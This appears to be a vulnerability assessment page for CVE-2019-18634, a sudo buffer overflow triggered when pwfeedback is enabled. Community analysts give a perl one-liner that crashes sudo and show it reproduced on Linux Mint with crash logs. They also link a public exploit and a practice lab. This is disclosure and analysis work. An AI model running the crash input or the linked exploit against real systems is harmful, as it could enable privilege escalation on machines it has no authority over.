Low
CVE-2019-18634
CVE-2019-18634
Description
In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.
Add Assessment
Technical Analysis
This exploit is similar to CVE-2019-14287, in that it requires a specific config within /etc/sudoers. Present in sudo versions < 1.8.26, this vuln surrounds the pwfeedback option: an option that allows sudo to display asteriks when typing a sudo password. This module is susceptible to a buffer overflow attack, which was demonstrated in the following PoC:
$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id Password: Segmentation fault
Source – https://www.exploit-db.com/exploits/47995
An exploit for this vuln can be found here – https://github.com/saleemrashid/sudo-cve-2019-18634
A preconfigured test environment can be found here – https://tryhackme.com/room/sudovulnsbof
Technical Analysis
This isn’t a default in most installations I’ve seen. Looks like Linux Mint uses it, though, and that’s a decently sized target, IMHO. Popular for new users to Linux, which kind of explains why they’d turn on this particular setting. That said, I don’t think the corporate impact is high – unless they’re using Mint for workstations.
Great find, Joe. :–)
Verified against Linux Mint 19.3 Tricia live CD:
mint@mint:~$ uname -a Linux mint 5.0.0-32-generic #34~18.04.2-Ubuntu SMP Thu Oct 10 10:36:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux mint@mint:~$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id [sudo] password for mint: Segmentation fault mint@mint:~$ dmesg | tail -2 [ 126.375340] sudo[1896]: segfault at 55ff66d8c000 ip 000055ff66b7e3b8 sp 00007fff565b26a0 error 6 in sudo[55ff66b66000+22000] [ 126.375345] Code: 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 40 00 48 8d 35 ac 6b 00 00 ba 01 00 00 00 89 df e8 8d c2 fe ff 0f b6 54 24 17 <41> 88 17 49 83 c7 01 4c 89 74 24 08 49 83 ee 01 4d 85 f6 0f 85 d7 mint@mint:~$
Mint’s mitigations:
mint@mint:~/Downloads$ ./checksec --file=/usr/bin/sudo RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Full RELRO Canary found NX enabled PIE enabled No RPATH RW-RUNPATH No Symbols Yes 6 12 /usr/bin/sudo mint@mint:~/Downloads$
CVSS V3 Severity and Metrics
General Information
Vendors
- debian,
- sudo project
Products
- debian linux 10.0,
- debian linux 8.0,
- debian linux 9.0,
- sudo
References
Advisory
